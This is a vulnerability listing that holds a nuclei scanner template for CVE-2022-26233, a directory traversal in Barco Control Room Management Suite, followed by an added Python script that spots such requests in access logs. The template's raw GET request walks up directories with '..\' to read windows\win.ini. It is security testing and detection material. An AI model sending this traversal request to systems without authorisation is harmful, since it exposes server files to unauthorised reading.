Barco Control Room Management Suite <=2.9 Build 0275 - Local File Inclusion

05 May 2022 01:44:55 | Reported by ProjectDiscovery | Type: nuclei | Source: github.com

Barco Control Room Management Suite <=2.9 is affected by a local file inclusion vulnerability that allows unauthorized access to sensitive files.

id: CVE-2022-26233

info:
  name: Barco Control Room Management Suite <=2.9 Build 0275 - Local File Inclusion
  author: 0x_Akoko
  severity: high
  description: Barco Control Room Management through Suite 2.9 Build 0275 is vulnerable to local file inclusion that could allow attackers to access sensitive information and components. Requests must begin with the "GET /..\.." substring.
  impact: |
    An attacker can exploit this vulnerability to read sensitive files on the server, potentially leading to unauthorized access or information disclosure.
  remediation: |
    Upgrade Barco Control Room Management Suite to a version higher than 2.9 Build 0275 to mitigate the vulnerability.
  reference:
    - https://0day.today/exploit/37579
    - http://seclists.org/fulldisclosure/2022/Apr/0
    - http://packetstormsecurity.com/files/166577/Barco-Control-Room-Management-Suite-Directory-Traversal.html
    - https://nvd.nist.gov/vuln/detail/CVE-2022-26233
    - https://github.com/ARPSyndicate/cvemon
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2022-26233
    cwe-id: CWE-22
    epss-score: 0.00628
    epss-percentile: 0.78973
    cpe: cpe:2.3:a:barco:control_room_management_suite:*:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: barco
    product: control_room_management_suite
  tags: cve,cve2022,barco,lfi,seclists,packetstorm

http:
  - raw:
      - |+
        GET /..\..\..\..\..\..\..\..\..\..\windows\win.ini HTTP/1.1
        Host: {{Hostname}}

    unsafe: true
    matchers:
      - type: word
        part: body
        words:
          - "bit app support"
          - "fonts"
          - "extensions"
        condition: and
# digest: 490a00463044022028eab71e6341026afe116eb9241a68c38d744985d87bdb2c299aa5902fb992660220563c5f551edd0f849549b2fbef53453359ed9b8cf6b13e77cc5d4dfd16742884:922c64590222798bb761d5b6d8e72950
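
A defender-side check for the request shape this template sends, given here as an added example that is not part of the original template or of the ProjectDiscovery project: it scans access-log lines for request targets that begin with a chain of `..\` steps, percent-decoding them first. The combined log format, the function names and the sample lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import unquote

# Request line inside a common/combined-format access log entry (assumed format).
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')
# Target that begins, right after the leading slash, with two or more
# parent-directory steps separated by a backslash or a forward slash.
TRAVERSAL_PREFIX_RE = re.compile(r'^/(?:\.\.[\\/]){2,}')

def decode_target(target: str, rounds: int = 3) -> str:
    """Percent-decode repeatedly so %5c and double-encoded %255c are also caught."""
    for _ in range(rounds):
        decoded = unquote(target)
        if decoded == target:
            break
        target = decoded
    return target

def is_traversal_probe(log_line: str) -> bool:
    """True when the logged request target starts with a parent-directory chain."""
    m = REQUEST_RE.search(log_line)
    if not m:
        return False
    return bool(TRAVERSAL_PREFIX_RE.match(decode_target(m.group("target"))))

def scan(lines):
    """Return (line_number, line) for every suspicious entry."""
    return [(n, line) for n, line in enumerate(lines, 1) if is_traversal_probe(line)]

# Constructed sample log lines (documentation addresses, not real traffic).
SAMPLE_LOG = [
    r'192.0.2.10 - - [05/May/2022:01:44:55 +0000] "GET /..\..\..\..\windows\win.ini HTTP/1.1" 200 92',
    r'192.0.2.11 - - [05/May/2022:01:45:01 +0000] "GET /index.html HTTP/1.1" 200 5120',
    r'192.0.2.12 - - [05/May/2022:01:45:09 +0000] "GET /..%5c..%5c..%5cwindows%5cwin.ini HTTP/1.1" 404 0',
    r'192.0.2.13 - - [05/May/2022:01:45:12 +0000] "GET /docs/..\notes.txt HTTP/1.1" 200 300',
]

if __name__ == "__main__":
    for n, line in scan(SAMPLE_LOG):
        print(f"line {n}: {line}")
```

A hit with a 200 status and a small response body deserves a closer look than a 404, since the template's matcher keys on `win.ini` content being returned.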

05 May 2022 01:55 (current)
Vulners AI Score: 7.3 (High risk) | CVSS2: 5 | CVSS3: 7.5 | EPSS: 0.014